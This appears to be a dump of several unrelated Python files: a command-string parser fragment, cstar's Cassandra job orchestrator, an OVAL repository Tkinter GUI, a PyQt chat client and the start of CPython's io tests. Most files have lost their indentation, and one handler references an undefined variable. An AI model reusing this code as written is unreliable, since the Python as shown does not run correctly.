# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "{posargs}" or word == "[]":
newcommand += posargs_string
continue
elif word.startswith("{posargs:") and word.endswith("}"):
if posargs:
newcommand += posargs_string
continue
else:
word = word[9:-1]
new_arg = ""
new_word = reader._replace(word)
new_word = reader._replace(new_word)
new_word = new_word.replace("\\{", "{").replace("\\}", "}")
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
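# Example (illustrative): a commands value such as
#   commands =
#       pytest {posargs} \
#           --cov
# joins the continued line and is parsed into [["pytest", "--cov"]] when no
# positional arguments are given; with positional arguments, {posargs} is replaced
# by them before the line is split with shlex.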
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
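# Example (illustrative): CommandParser("pytest {posargs} tests").words() returns
# ["pytest", " ", "{posargs}", " ", "tests"]; whitespace runs are kept as separate
# words so the command can be reassembled verbatim around substitutions.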
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
job.py
|
# Copyright 2017 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import queue
import time
import socket
import os
import threading
import functools
import pickle
import sys
import cstar.remote
import cstar.endpoint_mapping
import cstar.topology
from cstar.topology import Topology
import cstar.nodetoolparser
import cstar.state
import cstar.strategy
import cstar.jobrunner
import cstar.jobprinter
import cstar.jobwriter
from cstar.exceptions import BadSSHHost, NoHostsSpecified, HostIsDown, \
NoDefaultKeyspace, UnknownHost, FailedExecution
from cstar.output import msg, debug, emph, info, error, warn
MAX_ATTEMPTS = 3
@functools.lru_cache(None)
def ip_lookup(name):
return socket.gethostbyname(name)
class Job(object):
"""The class that wires all the business logic together.
Currently polluted by some business logic of its own. The job handling and some small snippets of code
should be moved out of this class.
"""
def __init__(self):
self._connections = {}
self.results = queue.Queue()
self.handled_finished_jobs = set()
self.state = None
self.command = None
self.job_id = None
self.timeout = None
self.env = None
self.errors = []
self.do_loop = False
self.job_runner = None
self.key_space = None
self.output_directory = None
self.is_preheated = False
self.sleep_on_new_runner = None
self.sleep_after_done = None
self.ssh_username = None
self.ssh_password = None
self.ssh_identity_file = None
self.jmx_username = None
self.jmx_password = None
self.jmx_passwordfile = None
self.hosts_variables = dict()
self.returned_jobs = list()
self.schema_versions = list()
self.status_topology_hash = list()
self.resolve_hostnames = False
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.close()
if exc_type:
if exc_type == NoHostsSpecified:
error("No hosts specified")
elif exc_type in [BadSSHHost, NoDefaultKeyspace, HostIsDown, UnknownHost]:
error(exc_value)
def get_cluster_topology(self, seed_nodes):
cluster_names = list()
self.schema_versions = list()
self.status_topology_hash = list()
topologies = list()
count = 0
tried_hosts = []
for host in seed_nodes:
tried_hosts.append(host)
conn = self._connection(host)
describe_res = self.run_nodetool(conn, "describecluster")
status_res = self.run_nodetool(conn, "status")
if (describe_res.status == 0) and (status_res.status == 0):
(cluster_name, schema_version) = cstar.nodetoolparser.parse_describe_cluster(describe_res.out)
if cluster_name not in cluster_names:
cluster_names.append(cluster_name)
topologies.append(cstar.nodetoolparser.parse_nodetool_status(status_res.out, cluster_name, self.reverse_dns_preheat, self.resolve_hostnames))
self.schema_versions.append(schema_version)
self.status_topology_hash.append(topologies[len(topologies) - 1].get_hash())
count += 1
if count >= MAX_ATTEMPTS:
break
if len(topologies) > 0:
final_topology = set()
for i in range(len(topologies)):
final_topology.update(topologies[i].hosts)
return Topology(final_topology)
raise HostIsDown("Could not find any working host while fetching topology. Is Cassandra actually running? Tried the following hosts:",
", ".join([x.ip for x in tried_hosts]))
def get_cache_file_path(self, cache_type):
debug("Cache file: {}-{}-{}".format(cache_type, "-".join(sorted(self.schema_versions)), "-".join(sorted(self.status_topology_hash))))
return os.path.join(self.cache_directory, "{}-{}-{}".format(cache_type, "-".join(sorted(self.schema_versions)), "-".join(sorted(self.status_topology_hash))))
def maybe_get_data_from_cache(self, cache_type):
try:
cache_file = self.get_cache_file_path(cache_type)
if os.path.exists(cache_file):
debug("Getting {} from cache".format(cache_type))
cached_data = pickle.load(open(cache_file, 'rb'))
return cached_data
except Exception:
warn("Failed getting data from cache : {}".format(sys.exc_info()[2]))
debug("Cache miss for {}".format(cache_type))
return None
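# Note (illustrative summary): the cache key combines the sorted schema versions
# and topology hashes gathered in get_cluster_topology, so any schema or topology
# change automatically invalidates a previously cached endpoint mapping.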
def reverse_dns_preheat(self, ips):
if self.is_preheated:
return
self.is_preheated = True
def get_host_by_addr(ip):
try:
socket.gethostbyaddr(ip)
except socket.herror:
pass
def create_lookup_thread(ip):
return threading.Thread(target=lambda: get_host_by_addr(ip))
print("Preheating DNS cache")
threads = [create_lookup_thread(ip) for ip in set(ips)]
for thread in threads:
thread.start()
for thread in threads:
# Don't wait around forever for slow DNS
thread.join(1.0)
print("Preheating done")
def get_keyspaces(self, conn):
cfstats_output = self.run_nodetool(conn, *("cfstats", "|", "grep", "Keyspace"))
return cstar.nodetoolparser.extract_keyspaces_from_cfstats(cfstats_output.out)
def get_endpoint_mapping(self, topology):
clusters = []
failed_hosts = []
mappings = []
count = 0
endpoint_mappings = self.maybe_get_data_from_cache("endpoint_mapping")
if endpoint_mappings is not None:
return endpoint_mappings
for host in topology.get_up():
if host.cluster in clusters:
# We need to fetch keyspaces on one node per cluster, no more.
continue
count = 0
conn = self._connection(host)
if self.key_space:
keyspaces = [self.key_space]
else:
keyspaces = self.get_keyspaces(conn)
has_error = True
for keyspace in keyspaces:
if not keyspace.startswith("system"):
debug("Fetching endpoint mapping for keyspace", keyspace)
res = self.run_nodetool(conn, *("describering", keyspace))
has_error = False
if res.status != 0 and not keyspace.startswith("system"):
has_error = True
break
describering = cstar.nodetoolparser.parse_nodetool_describering(res.out)
range_mapping = cstar.nodetoolparser.convert_describering_to_range_mapping(describering)
mappings.append(cstar.endpoint_mapping.parse(range_mapping, topology, lookup=ip_lookup))
if has_error:
if count >= MAX_ATTEMPTS:
failed_hosts.append(host)
break
else:
clusters.append(host.cluster)
count += 1
if failed_hosts:
raise HostIsDown("Following hosts couldn't be reached: {}".format(', '.join(host.fqdn for host in failed_hosts)))
endpoint_mappings = cstar.endpoint_mapping.merge(mappings)
pickle.dump(dict(endpoint_mappings), open(self.get_cache_file_path("endpoint_mapping"), 'wb'))
return endpoint_mappings
def run_nodetool(self, conn, *cmds):
if self.jmx_username and self.jmx_password:
return conn.run(("nodetool", "-u", self.jmx_username, "-pw", self.jmx_password, *cmds))
elif self.jmx_username and self.jmx_passwordfile:
return conn.run(("nodetool", "-u", self.jmx_username, "-pwf", self.jmx_passwordfile, *cmds))
else:
return conn.run(("nodetool", *cmds))
def setup(self, hosts, seeds, command, job_id, strategy, cluster_parallel, dc_parallel, job_runner,
max_concurrency, timeout, env, stop_after, key_space, output_directory,
ignore_down_nodes, dc_filter,
sleep_on_new_runner, sleep_after_done,
ssh_username, ssh_password, ssh_identity_file, ssh_lib,
jmx_username, jmx_password, jmx_passwordfile, resolve_hostnames, hosts_variables):
msg("Starting setup")
msg("Strategy:", cstar.strategy.serialize(strategy))
msg("Cluster parallel:", cluster_parallel)
msg("DC parallel:", dc_parallel)
self.command = command
self.job_id = job_id
self.timeout = timeout
self.env = env
self.job_runner = job_runner
self.key_space = key_space
self.output_directory = output_directory or os.path.expanduser("~/.cstar/jobs/" + job_id)
self.cache_directory = os.path.expanduser("~/.cstar/cache")
self.sleep_on_new_runner = sleep_on_new_runner
self.sleep_after_done = sleep_after_done
self.ssh_username = ssh_username
self.ssh_password = ssh_password
self.ssh_identity_file = ssh_identity_file
self.ssh_lib = ssh_lib
self.jmx_username = jmx_username
self.jmx_password = jmx_password
self.jmx_passwordfile = jmx_passwordfile
self.resolve_hostnames = resolve_hostnames
self.hosts_variables = hosts_variables
if not os.path.exists(self.output_directory):
os.makedirs(self.output_directory)
if not os.path.exists(self.cache_directory):
os.makedirs(self.cache_directory)
msg("Loading cluster topology")
if seeds:
current_topology = cstar.topology.Topology([])
current_topology = current_topology | self.get_cluster_topology(seeds)
original_topology = current_topology
if dc_filter:
original_topology = original_topology.with_dc_filter(dc_filter)
else:
current_topology = cstar.topology.Topology()
hosts_ip_set = set(socket.gethostbyname(host) for host in hosts)
for raw_host in hosts:
host = socket.gethostbyname(raw_host)
if host in current_topology:
continue
current_topology = current_topology | self.get_cluster_topology((host,))
original_topology = cstar.topology.Topology(host for host in current_topology if host.ip in hosts_ip_set)
msg("Done loading cluster topology")
debug("Run on hosts", original_topology)
debug("in topology", current_topology)
msg("Generating endpoint mapping")
if strategy is cstar.strategy.Strategy.TOPOLOGY:
endpoint_mapping = self.get_endpoint_mapping(current_topology)
msg("Done generating endpoint mapping")
else:
endpoint_mapping = None
msg("Skipping endpoint mapping because of selected strategy")
self.state = cstar.state.State(original_topology, strategy, endpoint_mapping,
cluster_parallel, dc_parallel, dc_filter=dc_filter,
max_concurrency=max_concurrency, current_topology=current_topology,
stop_after=stop_after, ignore_down_nodes=ignore_down_nodes)
msg("Setup done")
def update_current_topology(self, skip_nodes=()):
new_topology = cstar.topology.Topology()
for cluster in self.state.original_topology.get_clusters():
seeds = self.state.get_idle().with_cluster(cluster).without_hosts(skip_nodes).get_up()
# When using the all strategy, all nodes go to running, so we need to pick some node
seeds = seeds or self.state.current_topology.with_cluster(cluster).get_up()
new_topology = new_topology | self.get_cluster_topology(seeds)
self.state = self.state.with_topology(new_topology)
def wait_for_node_to_return(self, nodes=()):
"""Wait until node returns"""
while True:
try:
self.update_current_topology(nodes)
if self.state.is_healthy():
break
except BadSSHHost as e:
# If the instance used to poll cluster health is down it probably means that machine is rebooting
# State is then NOT healthy, so continue waiting...
debug("SSH to %s failed, instance down?" % (node, ), e)
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
time.sleep(5)
def resume(self):
self.update_current_topology()
self.resume_on_running_hosts()
self.run()
def run(self):
self.do_loop = True
cstar.jobwriter.write(self)
if not self.state.is_healthy():
raise HostIsDown(
"Can't run job because hosts are down: " + ", ".join(
host.fqdn for host in self.state.current_topology.get_down()))
while self.do_loop:
self.schedule_all_runnable_jobs()
if self.state.is_done():
self.do_loop = False
self.wait_for_any_job()
self.wait_for_all_jobs()
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
self.print_outcome()
def resume_on_running_hosts(self):
for host in self.state.progress.running:
debug("Resume on host", host.fqdn)
threading.Thread(target=self.job_runner(self, host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib, self.hosts_variables),
name="cstar %s" % host.fqdn).start()
time.sleep(self.sleep_on_new_runner)
def print_outcome(self):
if self.state.is_done() and not self.errors:
if len(self.state.progress.done) == self.state.stop_after:
cstar.jobwriter.write(self)
msg("Job", self.job_id, "successfully ran on", self.state.stop_after, "hosts.\nTo finish the job, run",
emph("cstar continue %s" % (self.job_id,)))
msg("Job", self.job_id, "finished successfully")
else:
msg("Job", self.job_id, "finished with errors.\n"
"%s nodes finished successfully\n"
"%s nodes had errors\n"
"%s nodes didn't start executing"
% (len(self.state.progress.done),
len(self.state.progress.failed),
len(self.state.original_topology) - len(self.state.progress.done) - len(self.state.progress.failed)))
def wait_for_all_jobs(self):
while self.state.progress.running:
host, result = self.results.get()
self.returned_jobs.append((host, result))
if self.results.empty():
self.handle_finished_jobs(self.returned_jobs)
self.returned_jobs = list()
def wait_for_any_job(self):
if self.do_loop:
host, result = self.results.get(timeout=self.timeout)
self.returned_jobs.append((host, result))
while not self.results.empty():
host, result = self.results.get(timeout=self.timeout)
self.returned_jobs.append((host, result))
self.handle_finished_jobs(self.returned_jobs)
self.wait_for_node_to_return(returned_job[0] for returned_job in self.returned_jobs)
self.returned_jobs = list()
def handle_finished_jobs(self, finished_jobs):
debug("Processing ", len(finished_jobs), " finished jobs")
for finished_job in finished_jobs:
host = finished_job[0]
result = finished_job[1]
if result.status != 0:
self.errors.append((host, result))
self.state = self.state.with_failed(host)
msg("Failure on host", host.fqdn)
if result.out:
msg("stdout:", result.out)
if result.err:
msg("stderr:", result.err)
self.do_loop = False
else:
self.state = self.state.with_done(host)
info("Host %s finished successfully" % (host.fqdn,))
if result.out:
info("stdout:", result.out, sep="\n")
if result.err:
info("stderr:", result.err)
if self.sleep_after_done:
debug("Sleeping %d seconds..." % self.sleep_after_done)
time.sleep(self.sleep_after_done)
cstar.jobwriter.write(self)
# Signal the jobrunner that it can delete the remote job files and terminate.
for finished_job in finished_jobs:
host, result = finished_job
self.handled_finished_jobs.add(host)
def schedule_all_runnable_jobs(self):
while True:
next_host = self.state.find_next_host()
if not next_host:
if not self.state.progress.running:
self.do_loop = False
break
if (not next_host.is_up) and self.state.ignore_down_nodes:
self.state = self.state.with_done(next_host)
else:
self.state = self.state.with_running(next_host)
self.schedule_job(next_host)
cstar.jobwriter.write(self)
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
def schedule_job(self, host):
debug("Running on host", host.fqdn)
threading.Thread(target=self.job_runner(self, host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib, self.get_host_variables(host)),
name="cstar %s" % host.fqdn).start()
time.sleep(self.sleep_on_new_runner)
def _connection(self, host):
if host not in self._connections:
self._connections[host] = cstar.remote.Remote(host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib, self.get_host_variables(host))
return self._connections[host]
def close(self):
for name, conn in self._connections.items():
if conn:
conn.close()
self._connections = {}
def get_host_variables(self, host):
hostname = host
if type(host).__name__ == "Host":
hostname = host.fqdn
host_variables = dict()
if hostname in self.hosts_variables.keys():
host_variables = self.hosts_variables[hostname]
debug("Variables for host {} = {}".format(hostname, host_variables))
return host_variables
|
gui.py
|
import os
import re
import sys
import tkinter as tk
import tkinter.ttk as ttk
import modules.list_repository
import modules.build_definition
from threading import Thread
class BuildFrameObject:
build_frame = None
list_frame_object = None
operational_frame_object = None
class OperationalFrameObject:
# parent object
build_frame_object = None
# self frame
operational_frame = None
# child frames
console_frame = None
control_frame = None
# widgets
console = None
console_scrollbar=None
build_button=None
name_label=None
# processing thread
thread = None
def __init__(self, build_frame_object, build_frame):
self.build_frame_object=build_frame_object
self.operational_frame=tk.Frame(build_frame)
# Methods for console init
def initConsoleFrame(self):
self.console_frame=tk.Frame(self.operational_frame)
def initConsole(self):
self.console=tk.Text(self.console_frame, wrap=tk.WORD, width=45, font=("Courier", 9))
self.console_scrollbar=ttk.Scrollbar(master=self.console_frame, orient='vertical', command=self.console.yview)
self.console.configure(yscrollcommand=self.console_scrollbar.set)
# Methods for controls init
def initControlsFrame(self):
self.control_frame = tk.Frame(self.operational_frame)
def initControls(self):
self.name_label = tk.Label(self.control_frame, text=' OVAL Repository Management ')
self.build_button = tk.Button(self.control_frame, text='Build OVAL definitions')
self.build_button.bind('<1>',self.onBuildButtonClick)
def onBuildButtonClick(self, args):
"""Event listener for Build button
This listener only starts a new thread so the GUI will not freeze.
The thread won't be started if the button is disabled, which means
a build is currently in progress.
"""
if self.build_button['state']=='disabled':
return
Thread(target=self.buildButtonWorker).start()
def buildButtonWorker(self):
"""Actual button action
This method will disable button until end and start building
chosen OVAL definitions.
"""
# disable the button to prevent spawning multiple build threads
self.build_button.configure(state='disabled')
self.build_button.update()
text = self.console
tree = self.build_frame_object.list_frame_object.tree
items = tree.selection()
text.delete(1.0,tk.END)
names = [ ]
build_query=''
for i in items:
it = tree.item(i)
if it['text']=='definitions':
try:
names.append(it['values'][0])
query = it['values'][1]
def_id = query.split('\\')[-1]
build_query+=def_id+', '
except IndexError as e:
print('IndexError: '+str(e))
pass
if build_query:
text.insert(1.0,'Building definitions (schema version 5.11.1):\n')
if len(names)<50:
for n in names:
text.insert(2.0, '*'+n+'\n')
else:
length = str(len(names))
text.insert(2.0, f'Too many definitions to list by name. Building {length} definitions.')
# cut off the last comma
build_query = re.search('(.*)(, $)', build_query).group(1)
query = f'b --definition_id {build_query} --max_schema_version 5.11.1 -o out.xml'
sys.argv = query.split(' ')
modules.build_definition.build_definition()
text.insert(tk.END, '\n\nBuilding done. File: out.xml')
else:
text.insert(tk.END,'No definitions chosen! Nothing to build.\n')
self.build_button.configure(state='active')
self.build_button.update()
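# Example (illustrative, with hypothetical ids): selecting two definitions builds a
# query like "b --definition_id <id1>, <id2> --max_schema_version 5.11.1 -o out.xml",
# which is handed to modules.build_definition.build_definition() via sys.argv.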
class ListFrameObject:
# parent object
build_frame_object = None
# self frame
list_frame = None
# widgets
tree = None
scrollbar=None
def __init__(self, build_frame_object, build_frame):
# Pointer to outer frame and itself
self.build_frame_object=build_frame_object
self.list_frame=tk.Frame(build_frame)
# init tree and scrollbar
self.tree = ttk.Treeview(self.list_frame)
self.scrollbar = ttk.Scrollbar(self.list_frame, orient='vertical', command=self.tree.yview)
self.tree.configure(yscrollcommand=self.scrollbar.set)
# create columns
self.tree['columns']=('Title', 'Path')
self.tree.heading('#0', text='OVAL Class', anchor=tk.W)
self.tree.heading('#1', text = 'Title', anchor=tk.W)
self.tree.heading('#2', text = 'Path to file', anchor=tk.W)
self.tree.column('#0', minwidth=3, width=10)
self.tree.column('#1', minwidth=3, width=80)
self.tree.column('#2', minwidth=3, width=10)
self.tree.bind('<1>', self.onTreeClick)
def getRepoContent(self):
repo = modules.list_repository.get_repository_dir(os.path.relpath('./ScriptsEnvironment/repository/definitions'))
for oval_type in repo:
length =str(len(repo[oval_type]))
header = oval_type+' ['+length+']'
ent_folder = self.tree.insert('', tk.END, text=header, values=())
if oval_type=='definitions':
for id in repo[oval_type]:
self.tree.insert(ent_folder, tk.END, text=oval_type, values=(repo[oval_type][id], id))
#else:
# for entity in repo[oval_type]:
# self.tree.insert(ent_folder,tk.END, text=oval_type, values=(entity.replace('\\','\\\\')))
def onTreeClick(self, args):
item = self.tree.selection()[0]
print(self.tree.item(item))
def initListFrame(self):
self.list_frame_object = self.ListFrameObject(self, self.build_frame)
self.list_frame_object.getRepoContent()
def initOperationalFrame(self):
self.operational_frame_object=self.OperationalFrameObject(self, self.build_frame)
self.operational_frame_object.initConsoleFrame()
self.operational_frame_object.initConsole()
self.operational_frame_object.initControlsFrame()
self.operational_frame_object.initControls()
def packBuildFrame(self):
# packing oval list
self.list_frame_object.list_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
self.list_frame_object.tree.pack(side=tk.LEFT,fill=tk.BOTH, expand=True)
self.list_frame_object.scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
# packing control frame
self.operational_frame_object.operational_frame.pack(side=tk.RIGHT, fill=tk.BOTH)
# and its children
self.operational_frame_object.control_frame.pack(side=tk.TOP, fill=tk.BOTH)
self.operational_frame_object.name_label.pack(side=tk.TOP)
self.operational_frame_object.build_button.pack(side=tk.TOP)
self.operational_frame_object.console_frame.pack(side=tk.BOTTOM, fill=tk.BOTH)
self.operational_frame_object.console.pack(side=tk.LEFT,fill=tk.BOTH, expand=True)
self.operational_frame_object.console_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
def runBuildFrame(self):
self.build_frame.mainloop()
def __init__(self, root):
self.build_frame = root
def main():
root = tk.Tk()
root.geometry('1280x480')
root.title('OVAL Repository Management')
build_frame = BuildFrameObject(root)
build_frame.initListFrame()
build_frame.initOperationalFrame()
build_frame.packBuildFrame()
build_frame.runBuildFrame()
if __name__ == '__main__':
main()
|
Client.py
|
import socket
import threading
from PyQt5.QtWidgets import QMainWindow,QApplication
import client_ui
import sys
class Client:
def __init__(self, host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock = sock
self.sock.connect((host, port))
self.sock.send(b'1')
def sendThreadFunc(self):
while True:
try:
word = input()  # read a line of user input
self.sock.send(word.encode())  # send it to the server
except ConnectionAbortedError:
print('Server closed this connection!')
except ConnectionResetError:
print('Server is closed!')
def recvThreadFunc(self):
while True:
try:
otherword = self.sock.recv(1024) # socket.recv(recv_size)
print(otherword.decode())
except ConnectionAbortedError:
print('Server closed this connection!')
except ConnectionResetError:
print('Server is closed!')
class Main(QMainWindow,client_ui.Ui_MainWindow,Client):
def __init__(self):
super(self.__class__,self).__init__()
self.setupUi(self)
self.pushButton_2.setText("Send")
self.pushButton_2.clicked.connect(self.login)
self.pushButton.clicked.connect(self.send)
def login(self):
text="Welcome to chat room !" + self.textEdit.toPlainText() + "\nNow let\'s chat !" + self.textEdit.toPlainText()
self.textBrowser.append(text)
self.textBrowser.update()
self.lineEdit.setText("")
self.pushButton_2.setDisabled(True)
self.textEdit.setDisabled(True)
self.pushButton.setDisabled(False)
self.nickname=self.textEdit.toPlainText()
#self.sock.send(self.nickname.encode())
def send(self):
#self.sock.send(self.lineEdit.text().encode(()))
mes = " \n " + self.lineEdit.text() + ": You"
self.textBrowser.append(mes)
self.textBrowser.update()
def main():
    app = QApplication(sys.argv)
    MainWindow = Main()
    MainWindow.show()
    # Connect to the chat server and start the background receive threads
    # before blocking in the Qt event loop.  Both threads are daemons, so
    # they terminate automatically when the GUI exits.
    c = Client('140.138.145.58', 5550)
    th1 = threading.Thread(target=c.sendThreadFunc)
    th2 = threading.Thread(target=c.recvThreadFunc)
    for t in (th1, th2):
        t.setDaemon(True)
        t.start()
    sys.exit(app.exec_())
if __name__ == "__main__":
    main()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support.os_helper import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
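        # Fallback when ctypes is unavailable: array.array is still bytes-like
        # via the buffer protocol, although unlike the ctypes version it keeps
        # its sequence methods.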
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
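        # A None entry in the read stack simulates a raw stream in
        # non-blocking mode with no data currently available, so readinto()
        # reports "would block" by returning None.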
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
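    # write() mimics a non-blocking stream: if the registered blocker
    # character appears in the data, only the bytes before it are accepted
    # and their count is returned; if it is the very first byte, the blocker
    # is cleared and None is returned to signal "would block".  Without a
    # blocker the whole buffer is written.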
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
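        # truncate() changes the file size but not the current position,
        # so tell() still reports 5 here.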
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
